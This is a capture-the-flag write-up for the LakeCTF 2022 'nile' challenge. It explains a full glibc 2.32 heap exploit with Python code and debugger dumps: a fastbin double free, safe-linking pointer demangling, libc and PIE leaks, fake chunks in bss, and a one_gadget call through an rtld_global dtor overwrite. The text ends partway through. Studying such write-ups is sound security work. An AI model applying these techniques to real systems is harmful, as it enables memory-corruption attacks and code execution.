LakeCTF Qualifications 2022 - nile

When I wrote this challenge, glibc 2.32 was the latest and greatest, so I made sure I could exploit this on 2.27, 2.29, 2.31 and 2.32. I only expect you to do the 2.32 version ;)

nc chall.polygl0ts.ch 3800

Team: Super Guesser

Attachment: nile libc-2.32.so Dockerfile ld-2.32.so xpl.py

Welcome to Nile, the newest and most advanced publishing and selling platform known to mankind.
Would you like to:
        1. Add a fake endorsement
        2. Add a brief description
        3. Review your current entries
        4. Remove some data
        5. Upgrade your plan
        6. quit

>

nile was kind of your regular heap note challenge, where you can add, view and free chunks. But it had some twists, which made it quite hard to exploit.

Adding a fake endorsement creates a 0x30 chunk, adding a description creates a 0x50 chunk. All chunks are allocated via calloc, so tcache cannot be abused, because calloc will not serve chunks from tcache. So the easy path via tcache poisoning is not feasible :(

Also, since the challenge is using libc-2.32, we have to keep in mind that we cannot directly use double frees, since tcache will check for that. But we can get around this by first freeing 7 chunks regularly into tcache. Once tcache is full, the following frees are handled by the fastbins in main_arena, where only the chunk on top of the bin is compared against the one being freed, which enables us to use a double free (free A, free B, free A) again.
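To make the ordering a bit more tangible, here is a toy model of the two checks. It is only a sketch of how I understand the behaviour, not glibc code: `ToyHeap` and `try_free` are made-up names, and the bins are plain Python lists.

```python
# Toy model of free() for a single chunk size. NOT glibc code, just the
# two double-free checks reduced to list operations.
TCACHE_MAX = 7  # default number of entries per tcache bin


class ToyHeap:
    def __init__(self):
        self.tcache = []
        self.fastbin = []

    def free(self, chunk):
        # tcache looks through its whole bin for the chunk being freed
        if chunk in self.tcache:
            raise RuntimeError("free(): double free detected in tcache 2")
        if len(self.tcache) < TCACHE_MAX:
            self.tcache.append(chunk)
            return
        # the fastbin only compares against the chunk on top of the bin
        if self.fastbin and self.fastbin[-1] == chunk:
            raise RuntimeError("double free or corruption (fasttop)")
        self.fastbin.append(chunk)


def try_free(heap, chunk):
    try:
        heap.free(chunk)
        return "ok"
    except RuntimeError as err:
        return str(err)


heap = ToyHeap()
fill = [try_free(heap, "T%d" % i) for i in range(7)]    # fill tcache first
results = [try_free(heap, c) for c in ("A", "B", "A")]  # A, B, A goes through
direct = try_free(heap, "A")                            # A directly after A fails
print(fill, results, direct)
```

The point is only the order: as long as another chunk sits between the two frees of A, the fastbin check does not notice.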

With this, we can start leaking heap values (again, libc-2.32 is used, so heap addresses will be mangled).

def exploit(r):
    r.recvuntil("> ")

    # create initial chunks
    for i in range(12): 
        adddesc(0x20-8, "A"*(0x20-8))
    
    # fillup tcache 
    for i in range(7):  
        remove(i)

    # upgrade to be able to allocate more chunks
    upgrade()
    
    # double free first chunk
    remove(0)
    remove(1)
    remove(0)

    # add a new chunk (0 and 11 will now point to the same chunk)
    adddesc(0x20-8, "A")    # 11

    # free chunk 0
    remove(0)

    # leak heap value from chunk 11 (which is now freed)
    LEAK = u64(review()[:-1].ljust(8, "\x00"))

    log.info("LEAK       : %s" % hex(LEAK))

One thing to note for this… When developing the exploit locally with ASLR disabled, the leak will look wrong.

$ python xpl.py
[*] '/home/kileak/ctf/lake/nilework/libc-2.32.so'
    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled
[+] Starting local process './nile': pid 53115
[53115]
[*] Paused (press any to continue)
[*] LEAK       : 0x835d

This happens because the mangled heap address contains null bytes, so the leaked string ends after the first two bytes.

0x55555555d5b0:	0x0000000000000000	0x0000000000000051
0x55555555d5c0:	0x000055500000835d	0x0000000000000000 <= mangled ptr
0x55555555d5d0:	0x0000000000000000	0x0000000000000000
0x55555555d5e0:	0x0000000000000000	0x0000000000000000
0x55555555d5f0:	0x0000000000000000	0x0000000000000000
0x55555555d600:	0x0000000000000000	0x0000000000000051
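The truncation can be reproduced offline with the two values from the runs shown here. This is a small sketch which assumes that review prints the entry like a C string (so the output stops at the first null byte); `as_printed` is a hypothetical helper, not part of the exploit.

```python
import struct


def as_printed(value):
    """Return what a string-style read of an 8-byte value would leak."""
    raw = struct.pack("<Q", value)        # bytes as they sit in memory
    visible = raw.split(b"\x00", 1)[0]    # assumption: output stops at the first null
    return struct.unpack("<Q", visible.ljust(8, b"\x00"))[0]


no_aslr = as_printed(0x000055500000835d)    # mangled pointer without ASLR
with_aslr = as_printed(0x000055681185831f)  # mangled pointer from the ASLR run

print(hex(no_aslr), hex(with_aslr))
```

Without ASLR only the two low bytes survive, with ASLR the first six bytes usually contain no null byte and the whole pointer comes through.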

Though with ASLR enabled, it will not contain any null bytes most of the time and can just be read this way.

kileak@beast:~/ctf/lake/nilework$ python xpl.py 
[*] '/home/kileak/ctf/lake/nilework/libc-2.32.so'
    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled
[+] Starting local process './nile': pid 53219
[53219]
[*] Paused (press any to continue)
[*] LEAK       : 0x55681185831f

But while developing the exploit, we don’t want to activate ASLR. Since we know that the leak will work correctly remotely, we can just add a small fix to let our exploit also work locally with ASLR deactivated.

# leak heap value from chunk 11 (which is now freed)
with open("/proc/sys/kernel/randomize_va_space", "r") as f:
  state = f.read()[0]

print(hexdump(state))
ASLR = state != "0"   # 0 = off, 1 and 2 both randomize the mappings

if LOCAL and not ASLR:      
  LEAK = 0x000055500000835d # 0x000055500000811d
else:
  LEAK = u64(review()[:-1].ljust(8, "\x00"))

log.info("LEAK       : %s" % hex(LEAK))

So, when we’re running locally and ASLR is disabled, we just set the value it “should” be, and from here on we can debug it the same way with and without ASLR.

$ python xpl.py 
[*] '/home/kileak/ctf/lake/nilework/libc-2.32.so'
    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled
[+] Starting local process './nile': pid 54387
[54387]
[*] Paused (press any to continue)
[*] LEAK       : 0x55500000835d

This will give us a mangled heap pointer, which can luckily be reversed to get to the real heap address.

def demangle(obfus_ptr):
    o2 = (obfus_ptr >> 12) ^ obfus_ptr
    return (o2 >> 24) ^ o2

...

HEAP = demangle(LEAK)

$ python xpl.py
[*] '/home/kileak/ctf/lake/nilework/libc-2.32.so'
    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled
[+] Starting local process './nile': pid 54785
[54785]
[*] Paused (press any to continue)
[*] LEAK       : 0x55500000835d
[*] HEAP       : 0x55555555d600
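To convince yourself that demangle really undoes the safe-linking, the round trip can be checked offline. A minimal sketch: `mangle` mirrors the `(pos >> 12) ^ ptr` scheme of glibc 2.32, `pos` and `ptr` are taken from the heap dumps in this writeup, and the shortcut in `demangle` assumes that both lie in the same page (`pos >> 12 == ptr >> 12`) and that addresses fit into 48 bits.

```python
def mangle(pos, ptr):
    """Safe-linking: pos is the address where the pointer is stored."""
    return (pos >> 12) ^ ptr


def demangle(obfus_ptr):
    """Undo mangle() when pos and ptr share the same page number."""
    o2 = (obfus_ptr >> 12) ^ obfus_ptr
    return (o2 >> 24) ^ o2


pos = 0x55555555d5c0   # address of the fd field of the freed chunk
ptr = 0x55555555d600   # chunk this fd really points to

leak = mangle(pos, ptr)
print(hex(leak), hex(demangle(leak)))
```

If the pointer and its storage location were in different pages, this shortcut would no longer be exact, and you would have to xor with `pos >> 12` directly.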

This wasn’t too hard, but from here the real pain began (also not having a debug version of libc/ld at hand didn’t make it any better).

We have a double free, but since the chunks are served from the fastbins by calloc, they have to be 16-byte aligned and need a correct size (0x50 or 0x30), so we cannot just allocate anywhere…

But let’s start with the obvious things first. We need a libc leak.

For this, it would be useful to free a chunk, that will not be handled as a fastbin, but we can only create 0x30 and 0x50 chunks… Except, when doing an upgrade: This will allocate a 0xc00 chunk on the heap, in which the chunks of the professional plan will be stored.

If we could free this chunk, we would get some main_arena pointers onto the heap, which we might be able to leak afterwards, so let’s start with that.

While preparing the previous heap leak, I also triggered the upgrade functionality. This was done on purpose: after the leak, we still have a double freed pointer in main_arena and the 0xc00 chunk for the professional plan is already allocated on the heap.

main_arena

0x7ffff7fc19f0:	0x0000000000000000	0x0000000000000000
0x7ffff7fc1a00:	0x0000000000000000	0x0000000000000001
0x7ffff7fc1a10:	0x0000000000000000	0x0000000000000000
0x7ffff7fc1a20:	0x0000000000000000	0x000055555555d5b0 <= 0x50 free chunk
0x7ffff7fc1a30:	0x0000000000000000	0x0000000000000000
0x7ffff7fc1a40:	0x0000000000000000	0x0000000000000000
0x7ffff7fc1a50:	0x0000000000000000	0x0000000000000000
0x7ffff7fc1a60:	0x000055555555e260	0x0000000000000000
0x7ffff7fc1a70:	0x00007ffff7fc1a60	0x00007ffff7fc1a60
0x7ffff7fc1a80:	0x00007ffff7fc1a70	0x00007ffff7fc1a70

gef➤  x/30gx 0x000055555555d5b0
0x55555555d5b0:	0x0000000000000000	0x0000000000000051
0x55555555d5c0:	0x000055500000835d	0x0000000000000000
0x55555555d5d0:	0x0000000000000000	0x0000000000000000
0x55555555d5e0:	0x0000000000000000	0x0000000000000000

0x000055500000835d ^ 0x55555555d = 0x55555555d600

gef➤  x/30gx 0x000055555555d600
0x55555555d600:	0x0000000000000000	0x0000000000000051
0x55555555d610:	0x00005550000080ed	0x4141414141414141
0x55555555d620:	0x4141414141414141	0x0000000000000000
0x55555555d630:	0x0000000000000000	0x0000000000000000
0x55555555d640:	0x0000000000000000	0x0000000000000000
0x55555555d650:	0x0000000000000000	0x0000000000000c11  <= insert fake chunk here
0x55555555d660:	0x000055555555d5c0	0x0000000000000040  <= pro plan chunk
0x55555555d670:	0x0000000000000000	0x0000000000000000

0x00005550000080ed ^ 0x55555555d = 0x55555555d5b0

We’ll use the next allocation to overwrite the FD pointer of the first chunk with a pointer pointing to the pro_plan chunk.

After that we’ll allocate the next chunk (which is directly above the pro plan chunk) and now put a valid chunk size above the pro_plan chunk.

The next allocation will then get our fake chunk on top of the pro plan, and since we put a valid chunk size there, it should succeed.

GUARD = HEAP >> 12

log.info("HEAP guard : %s" % hex(GUARD))

# overwrite FD of double freed chunk with pointer above pro plan chunk
adddesc(0x20-8, p64((HEAP+0x40)^GUARD))

# create size for fake 0x50 chunk before pro_plan chunk
payload = p64(0) + p64(0)
payload += p64(0) + p64(0)
payload += p64(0) + p64(0)
payload += p64(0) + p64(0x51)[:1]

adddesc(len(payload), payload)

# get fake FD into main_arena
adddesc(0x20-8, "C"*(0x20-8))
adddesc(0x20-8, p64((HEAP+0x40)^GUARD))

0x55555555d5b0:	0x0000000000000000	0x0000000000000051
0x55555555d5c0:	0x000055500000831d	0x0000000000000000 <= overwritten FD
0x55555555d5d0:	0x0000000000000000	0x0000000000000000
0x55555555d5e0:	0x0000000000000000	0x0000000000000000
0x55555555d5f0:	0x0000000000000000	0x0000000000000000
0x55555555d600:	0x0000000000000000	0x0000000000000051

0x000055500000831d ^ 0x55555555d = 0x55555555d640 (points above pro plan chunk)
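The value written as FD can be recomputed from the leak alone. A short sketch with the non-ASLR numbers from the dumps; it also shows that `+` binds tighter than `^` in Python, so the expression works with or without parentheses.

```python
HEAP = 0x55555555d600      # demangled heap pointer from the earlier leak
GUARD = HEAP >> 12         # page number that safe-linking xors into fd

target = HEAP + 0x40       # 0x10 bytes above the pro plan chunk header

# '+' has higher precedence than '^', so both spellings give the same value
fd_implicit = HEAP + 0x40 ^ GUARD
fd_explicit = (HEAP + 0x40) ^ GUARD

print(hex(fd_explicit))
```

Strictly speaking the guard is the page number of the address where the fd is stored (0x55555555d5c0 here), which happens to be the same page as HEAP.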

adddesc(len(payload), payload)

0x55555555d600:	0x0000000000000000	0x0000000000000051
0x55555555d610:	0x0000000000000000	0x0000000000000000
0x55555555d620:	0x0000000000000000	0x0000000000000000
0x55555555d630:	0x0000000000000000	0x0000000000000000
0x55555555d640:	0x0000000000000000	0x0000000000000051 <= fake chunk size
0x55555555d650:	0x0000000000000000	0x0000000000000c11
0x55555555d660:	0x000055555555d5c0	0x0000000000000040

adddesc(0x20-8, "C"*(0x20-8))

0x7ffff7fc19f0:	0x0000000000000000	0x0000000000000000 <= main_arena
0x7ffff7fc1a00:	0x0000000000000000	0x0000000000000001
0x7ffff7fc1a10:	0x0000000000000000	0x0000000000000000
0x7ffff7fc1a20:	0x0000000000000000	0x000055555555d640 <= PTR to our fake chunk
0x7ffff7fc1a30:	0x0000000000000000	0x0000000000000000
0x7ffff7fc1a40:	0x0000000000000000	0x0000000000000000
0x7ffff7fc1a50:	0x0000000000000000	0x0000000000000000

The next 0x50 allocation will thus serve our fake chunk, with which we can overwrite the first bytes of the pro_plan chunk.

# allocate fake chunk and overwrite pro_plan chunk
payload = p64(0) + p64(0xc11)
payload += p64(HEAP+0x60) + p64(0x40)   # chunk ptr / size
payload += p64(0x0) + p64(HEAP+0x60)    # is_freed / chunk_ptr
payload += p64(0x40)                    # size

adddesc(len(payload), payload)

This will put a pointer to the pro_plan itself into the first pro chunk slot. We could now free it to get a free bin on the heap, but this will trigger malloc_consolidate, which will notice that our chunks are totally messed up and abort.

malloc_consolidate(): unaligned fastbin chunk detected

But luckily, we can get around this, by creating a dummy endorsement, which will fix this for us.

# create endorsement to avoid crash in malloc_consolidate
addfake(0x20-8, "A")

# free pro_plan chunk (free unsorted bin now)
remove(3)

0x55555555d640:	0x0000000000000000	0x0000000000000051
0x55555555d650:	0x0000000000000000	0x0000000000000c11
0x55555555d660:	0x00007ffff7fc1a60	0x00007ffff7fc1a60
0x55555555d670:	0x0000000000000000	0x0000000000000000
0x55555555d680:	0x0000000000000000	0x0000000000000001
0x55555555d690:	0x0000000000000000	0x0000000000000040
0x55555555d6a0:	0x0000000000000000	0x000055555555d5c0
0x55555555d6b0:	0x0000000000000040	0x0000000000000000
0x55555555d6c0:	0x000055555555d650	0x0000000000000040
0x55555555d6d0:	0x0000000000000000	0x000055555555e270
0x55555555d6e0:	0x0000000000000020	0x0000000000000000

Ok, so finally some libc pointers on the heap, now we’ll just need to get them “reviewable”. We have to keep in mind that any allocation will now be served from the freed bin, thus overwriting the pro plan entries themselves and also moving the libc addresses down the heap.

# allocate chunks pointing to freed unsorted bin address (so they can be reviewed)
payload = p64(HEAP+0x120) + p64(0x0)
payload += p64(0) 

addfake(len(payload), payload)
addfake(len(payload), payload)
addfake(len(payload), payload)
addfake(len(payload), payload)

Allocating four 0x30 chunks from the unsorted bin, each containing a pointer to where the main_arena pointers will be after those allocations, will result in a valid pro_plan.

0x55555555d650:	0x0000000000000000	0x0000000000000031
0x55555555d660:	0x000055555555d720	0x0000000000000000 <= slot 1 buffer / slot 1 size
0x55555555d670:	0x0000000000000000	0x0000000000000000 <= slot 1 freed  / slot 2 buffer
0x55555555d680:	0x0000000000000000	0x0000000000000031 <= slot 2 size   / slot 2 freed
0x55555555d690:	0x000055555555d720	0x0000000000000000 <= slot 3 buffer / slot 3 size
0x55555555d6a0:	0x0000000000000000	0x0000000000000000 <= slot 3 freed  / slot 4 buffer
0x55555555d6b0:	0x0000000000000000	0x0000000000000031 <= slot 4 size   / slot 4 freed
0x55555555d6c0:	0x000055555555d720	0x0000000000000000 <= slot 5 buffer / slot 5 size
0x55555555d6d0:	0x0000000000000000	0x0000000000000000 <= slot 5 freed  / slot 6 buffer
0x55555555d6e0:	0x0000000000000000	0x0000000000000031 <= slot 6 size   / slot 6 freed
0x55555555d6f0:	0x000055555555d720	0x0000000000000000 <= slot 7 buffer / slot 7 size
0x55555555d700:	0x0000000000000000	0x0000000000000000 <= slot 7 freed
0x55555555d710:	0x0000000000000000	0x0000000000000b51
0x55555555d720:	0x00007ffff7fc1a60	0x00007ffff7fc1a60 <= main_arena pointers

Though every second slot has an invalid buffer, this is not an issue anymore, since the IsFree part of it contains 0x31, so it will be skipped in review (as it will interpret those as freed notes) and we can just leak the other slots with valid pointers.
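The slot layout can be double checked by parsing the dump as 0x18-byte entries. This is a sketch under two assumptions taken from the annotations above: every entry is (buffer, size, is_freed) with 8 bytes each, and review skips every entry whose is_freed field is not zero.

```python
import struct

# Qwords copied from the dump, starting at the pro plan buffer 0x55555555d660
qwords = [
    0x000055555555d720, 0x0, 0x0,    # slot 1
    0x0,                0x0, 0x31,   # slot 2 (chunk header lands on is_freed)
    0x000055555555d720, 0x0, 0x0,    # slot 3
    0x0,                0x0, 0x31,   # slot 4
    0x000055555555d720, 0x0, 0x0,    # slot 5
    0x0,                0x0, 0x31,   # slot 6
    0x000055555555d720, 0x0, 0x0,    # slot 7
]

raw = struct.pack("<%dQ" % len(qwords), *qwords)
slots = list(struct.iter_unpack("<QQQ", raw))   # (buffer, size, is_freed)

# slots that review would print, counted from 1 like in the dump
reviewable = [i + 1 for i, (buf, size, freed) in enumerate(slots) if freed == 0]
print(reviewable)
```

All reviewable slots carry the same buffer pointer, so the first line of the review output is already the main_arena pointer.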

# leak main arena ptr from review
LEAK = u64(review()[:6].ljust(8, "\x00"))
libc.address = LEAK - 0x1c2a60

log.info("LIBC leak    : %s" % hex(LEAK))
log.info("LIBC         : %s" % hex(libc.address))

[*] LIBC leak    : 0x7ffff7fc1a60
[*] LIBC         : 0x7ffff7dff000
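A cheap sanity check for such a leak is that the resulting base has to be page aligned. A tiny sketch, where `libc_base` is a hypothetical helper and 0x1c2a60 is the offset used in this exploit for the provided libc-2.32.so:

```python
LEAK_OFFSET = 0x1c2a60   # offset of the leaked main_arena pointer in this libc


def libc_base(leak):
    base = leak - LEAK_OFFSET
    # a wrong leak or wrong offset almost never gives a page-aligned base
    if base & 0xfff:
        raise ValueError("unexpected leak: %#x" % leak)
    return base


base = libc_base(0x7ffff7fc1a60)
print(hex(base))
```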

Now, how to get rip control from here on?

First, I checked, if there were any valid chunk sizes (16 byte-aligned) in libc or ld, which could help us to overwrite something useful (I was already thinking in the direction of rtld_global there, since with aligned chunks, I didn’t see any feasible way to overwrite malloc_hook or free_hook).

But no chance, didn’t find any region, which contained a value, with which we could allocate a 0x50 or 0x30 chunk.

So, after a lot of failed tries, I checked bss to see, if we could somehow do something there.

0x555555558000 <free@got.plt>:       0x00007ffff7e8b2f0	0x0000555555555046
0x555555558010 <puts@got.plt>:       0x00007ffff7e76380	0x0000555555555066
0x555555558020 <printf@got.plt>:     0x00007ffff7e57b10	0x00007ffff7eefeb0
0x555555558030 <calloc@got.plt>:     0x00007ffff7e8ba50	0x00007ffff7e7c5e0
0x555555558040 <setvbuf@got.plt>:    0x00007ffff7e76aa0	0x00007ffff7e58f60
0x555555558050:                      0x0000000000000000	0x0000555555558058
0x555555558060 <stdout@GLIBC_2.2.5>: 0x00007ffff7fc2520	0x0000000000000000
0x555555558070 <stdin@GLIBC_2.2.5>:  0x00007ffff7fc1800	0x0000000000000000
0x555555558080 <stderr@GLIBC_2.2.5>: 0x00007ffff7fc2440	0x0000000000000000
0x555555558090:                      0x0000000000000000	0x0000000000000000
0x5555555580a0 <free_plan>:          0x0000000000000002	0x0000000000000002
0x5555555580b0 <free_plan+16>:       0x00005555555581d0	0x0000000000000000
0x5555555580c0 <pro_plan>:           0x0000000000000080	0x000000000000000a <= max pro bound / current pro count
0x5555555580d0 <pro_plan+16>:        0x000055555555d660	0x0000000000000000 <= pro plan chunk 
0x5555555580e0 <free_plan_data>:     0x000055555555d2a0	0x0000000000000000

Also no good chunk sizes there to, for example, attack the GOT… But can we create a fake chunk anywhere in bss?

Well, we kind of control the current pro count by adding more chunks, so we could create a valid chunk size there, and allocate a chunk overlapping the pointer to the pro_plan itself.
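The search for usable size fields can be scripted over a memory snapshot. The following is a sketch with a deliberately strict check (the whole size qword, ignoring the low four bits, has to equal the chunk size), which is sufficient but not necessary for the real fastbin check; `usable_chunks` and `snapshot` are made-up helpers, and the snapshot only covers the bss range 0x5555555580a0 to 0x5555555580ef from the dump.

```python
import struct


def usable_chunks(base, data, chunk_size):
    """Yield 16-byte aligned addresses whose size field (at +8) fits chunk_size."""
    for off in range(0, len(data) - 15, 16):
        if (base + off) % 16:
            continue                     # chunk header must be 16-byte aligned
        (size_field,) = struct.unpack_from("<Q", data, off + 8)
        if size_field & ~0xf == chunk_size:
            yield base + off


def snapshot(pro_count):
    # free_plan, pro_plan and free_plan_data as in the dump, counter variable
    qwords = [0x2, 0x2, 0x5555555581d0, 0x0, 0x80, pro_count,
              0x55555555d660, 0x0, 0x55555555d2a0, 0x0]
    return struct.pack("<10Q", *qwords)


BSS = 0x5555555580a0
before = list(usable_chunks(BSS, snapshot(0x0a), 0x50))   # counter as in the dump
after = list(usable_chunks(BSS, snapshot(0x50), 0x50))    # counter pushed to 0x50

print(before, [hex(a) for a in after])
```

With the counter at 0x50, the only candidate is the chunk starting at pro_plan itself, which is exactly the one overlapping the pro_plan pointer.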

This will not allow us to “directly” write data anywhere, but we could let it point to a table structure (like dtors). Creating chunks then in the pro plan, could potentially overwrite a table entry with a heap chunk, from which _dl_fini would then fetch the function to execute, which could lead to rip control.

But this would also mean that we need to be able to do a clean exit, since the challenge will call cleanup before exiting, which will try to free all currently allocated chunks (which will most likely fail after the whole mess we created on the heap by now).

We’ll also need to find a way around that, but let’s keep that for later.

First we’ll need a leak to elf region:

# overwrite an allocated chunk with pointer to pie address
payload = p64(libc.address+0x1c1d80) + p64(0x0)
payload += p64(0) + p64(0x51)[:1]                 # fix chunksize

addfake(len(payload), payload)

# leak pie address from review
PIE = u64(review().split("\n")[4].ljust(8, "\x00"))
	
log.info("PIE          : %s" % hex(PIE))

This will create another entry in our freed pro plan, with its buffer pointing to a libc address, that contains a pointer to our elf.

But at the current state, the heap is such a mess, that almost every allocation will go haywire. Thus we also need to put a valid chunksize in our payload to fix the followup fastbin. Otherwise malloc will notice the invalid fastbin and crash.

Allocations and frees really start to get a pain from here on…

[*] PIE          : 0x555555558080

With this, we successfully leaked an address pointing to bss, so we can now prepare putting a fake chunk there.

But trying to use the double free to allocate a chunk onto bss now triggered malloc_consolidate again, and it checked the unsorted bin on the heap, which… well… wasn’t linked correctly anymore, since we were overwriting it with pro plan chunks.

So, let’s first take a detour to repair this…

# double free
remove(0)
remove(1)
remove(0)
	
# point fd to unsorted bin
adddesc(0x10, p64((HEAP+0x130)^GUARD))
adddesc(0x10, p64(0xdeadbeef))
adddesc(0x10, p64(0xdeadbeef))

# fix unsorted bin pointers
payload = p64(0) + p64(0x21)
payload += p64(libc.address+0x1c2a60) + p64(libc.address+0x1c2a60)
payload += p64(0x20) + p64(0x20)

adddesc(len(payload), payload)

We use the double free again to allocate a fake chunk overlapping the bin, and then with the last allocation overwrite the size of the bin with 0x20 and put valid main_arena pointers into it. By resizing it, we won’t have to bother with it anymore, since we’ll never do an allocation that could fit into a 0x20 bin, so hopefully we’re good now.

Now, we can go on with allocating into bss, by first increasing the pro plan counter, so that when our final allocation happens, we’ll have a 0x50 size in it.

# increase pro plan counter
for i in range(61):
    addfake(10, "A")
    
# double free
remove(0)
remove(1)
remove(0)

# overwrite FD with pointer to pro_plan address
adddesc(0x10, p64((PIE+0x40)^GUARD))
adddesc(0x10, p64(0xdeadbeef))
adddesc(0x10, p64(0xdeadbeef))

bss

0x5555555580b0 <free_plan+16>:   0x00005555555581d0	0x0000000000000000
0x5555555580c0 <pro_plan>:       0x0000000000000080	0x000000000000004f <= pro plan counter
0x5555555580d0 <pro_plan+16>:    0x000055555555d660	0x0000000000000000
0x5555555580e0 <free_plan_data>: 0x000055555555d2a0	0x0000000000000000

main_arena

0x7ffff7fc1a00:	0x0000000000000000	0x0000000000000001
0x7ffff7fc1a10:	0x0000000000000000	0x0000000000000000
0x7ffff7fc1a20:	0x0000000000000000	0x00005555555580c0 <= 0x50 fastbin pointing to pro_plan chunk
0x7ffff7fc1a30:	0x0000000000000000	0x0000000000000000
0x7ffff7fc1a40:	0x0000000000000000	0x0000000000000000
0x7ffff7fc1a50:	0x0000000000000000	0x0000000000000000
0x7ffff7fc1a60:	0x000055555555ee00	0x000055555555d740

Looking good. The next allocation will increase the pro plan counter to 0x50 and then allocate the next chunk at 0x00005555555580c0, which will succeed, since we have a valid chunk size there now.

So, with the next chunk, we’ll be able to overwrite the pro_plan pointer itself. Keep in mind, that we’ll not be able to write arbitrary data there, but we’ll overwrite the target region with pointers to our heap chunks. That’s why I went for rtld_global.

After some experimentation (aka debugging the hell out of _dl_fini), the following region looked good:

0x7ffff7ffe1d0:	0x0000000000000000	0x00007ffff7ffe728
0x7ffff7ffe1e0:	0x0000000000000000	0x000055555555c010
0x7ffff7ffe1f0:	0x000055555555c0f0	0x000055555555c0e0
0x7ffff7ffe200:	0x0000000000000000	0x000055555555c090
0x7ffff7ffe210:	0x000055555555c0a0	0x000055555555c120
0x7ffff7ffe220:	0x000055555555c130	0x000055555555c140
0x7ffff7ffe230:	0x000055555555c0b0	0x000055555555c0c0
0x7ffff7ffe240:	0x000055555555c020	0x000055555555c030

We have to keep in mind that we have already allocated 0x50 chunks, so when overwriting the pro_plan pointer, we want to point it to dest_address-(0x50*0x18) (each pro plan entry takes 0x18 bytes), so that the next allocations will be written to dest_address.
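The offset arithmetic as a small sketch, using the non-ASLR address of the target region. `plan_base_for` and `slot_address` are hypothetical helpers; the entry size of 0x18 follows from the three 8-byte fields per slot.

```python
ENTRY_SIZE = 0x18   # buffer pointer, size, is_freed (8 bytes each)


def plan_base_for(dest, count):
    """Value for the pro_plan pointer so that slot number `count` lands on dest."""
    return dest - count * ENTRY_SIZE


def slot_address(base, index):
    return base + index * ENTRY_SIZE


RTLD = 0x7ffff7ffe1d0                 # start of the region we want to hit
base = plan_base_for(RTLD, 0x50)      # 0x50 entries already allocated

# the next three allocations end up at these addresses
landing = [slot_address(base, 0x50 + i) for i in range(3)]
print(hex(base), [hex(a) for a in landing])
```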

We’ll first start putting some placeholder chunks there, which will be needed later (this is the result from hours of fiddling around in ld, so it’s a bit hard to explain in the right order, but should become clearer later on)

if LOCAL and not ASLR:
  LD = libc.address + 0x1d1000
else:
  LD = libc.address + 0x1cb000

RTLD = LD + 0x2e1d0
TARGET = RTLD-(0x50*24)

log.info("TARGET CHUNK : %s" % hex(RTLD))

# overwrite pro_plan address with address in rtld_global
payload = p64(TARGET)

adddesc(len(payload), payload)

addfake(20, "X"*19)
addfake(20, "Y"*19)

# put a gadget placeholder here for later
payload = "Z"*8 + p64(0xdeadbeef)

addfake(20, payload)

gef➤  x/30gx 0x7ffff7ffe1d0
0x7ffff7ffe1d0:	0x000055555555ee10	0x0000000000000020 chunk    / size
0x7ffff7ffe1e0:	0x0000000000000000	0x000055555555ee40 is_freed / chunk
0x7ffff7ffe1f0:	0x0000000000000020	0x0000000000000000 size     / is_freed
0x7ffff7ffe200:	0x000055555555ee70	0x0000000000000020 chunk    / size
0x7ffff7ffe210:	0x0000000000000000	0x000055555555c120 is_freed
0x7ffff7ffe220:	0x000055555555c130	0x000055555555c140
0x7ffff7ffe230:	0x000055555555c0b0	0x000055555555c0c0

If we could exit now (getting through cleanup without a crash), this would just exit cleanly, since we haven’t overwritten any dtors yet. This was just to prepare some placeholders, which we’ll need later to be able to cleanly call one_gadget.

With the next allocations, we’ll overwrite a dtor pointer, which will be called later on, but we now also have to think about how we can survive cleanup in order to arrive at _dl_fini at all.

# double free
remove(0)
remove(1)
remove(0)

CALL = 0xfacebabe
	
# overwrite free fd with ptr to pro plan again
adddesc(0x10, p64((PIE+0x40)^GUARD))
adddesc(0x10, p64(0xdeadbeef)+p64(0xcafebabe))
adddesc(0x10, p64(0xdeadbeef)+p64(CALL))        # overwrite dtor entry
addfake(20, "A")

We again trigger a double free, so that we can control, where next allocations will go to. We then overwrite the FD of the doubly freed chunk with a pointer to pro_plan again. Then we’ll allocate a dummy chunk to pull in our fake fd into main_arena.

The last description will now overwrite a dtor pointer in rtld_global with 0xfacebabe, which could lead to code execution, if we make it there.

gef➤  x/30gx 0x7ffff7ffe1d0
0x7ffff7ffe1d0:	0x000055555555ee10	0x0000000000000020
0x7ffff7ffe1e0:	0x0000000000000000	0x000055555555ee40
0x7ffff7ffe1f0:	0x0000000000000020	0x0000000000000000
0x7ffff7ffe200:	0x000055555555ee70	0x0000000000000020
0x7ffff7ffe210:	0x0000000000000000	0x000055555555d5c0
0x7ffff7ffe220:	0x0000000000000040	0x0000000000000000
0x7ffff7ffe230:	0x000055555555d610	0x0000000000000040
0x7ffff7ffe240:	0x0000000000000000	0x000055555555d5c0 <= fake dtor chunk
0x7ffff7ffe250:	0x0000000000000040	0x0000000000000000
0x7ffff7ffe260:	0x000055555555eea0	0x0000000000000020

gef➤  x/30gx 0x000055555555d5c0
0x55555555d5c0:	0x00000000deadbeef	0x00000000facebabe <= dtor entry
0x55555555d5d0:	0x0000000000000000	0x0000000000000000
0x55555555d5e0:	0x0000000000000000	0x0000000000000000
0x55555555d5f0:	0x0000000000000000	0x0000000000000000
0x55555555d600:	0x0000000000000000	0x0000000000000051

The next allocation, will again overwrite the pro_plan pointer, since we already placed a FD pointing there in main_arena.

We’ll now let it point directly above itself (subtracting the appropriate offset of already allocated chunks again).

# overwrite pro_plan with address above pro plan to overwrite allocated chunk count (to make free work)
TARGET = (PIE+0x38)-(0x58*24)
payload = p64(TARGET)

adddesc(len(payload), payload)

0x5555555580a0 <free_plan>:    0x0000000000000002	0x0000000000000002
0x5555555580b0 <free_plan+16>: 0x00005555555581d0	0x0000000000000000 <= next allocation will be stored here
0x5555555580c0 <pro_plan>:     0x0000000000000080	0x0000000000000058 
0x5555555580d0 <pro_plan+16>:  0x0000555555557878	0x0000000000000000

By doing this, the next chunk allocation will write the buffer address to 0x5555555580b8, its size to 0x5555555580c0 and its is_freed value to 0x5555555580c8 (which happens to be the pro_plan counter).

This will effectively set the pro_plan_counter to 0. Exactly what we need to fix cleanup.

ONE_GADGET = libc.address + 0xcda5d

payload = "B"*0x10
payload += p64(ONE_GADGET)

addfake(31, payload)

0x5555555580b0 <free_plan+16>: 0x00005555555581d0	0x000055555555eed0
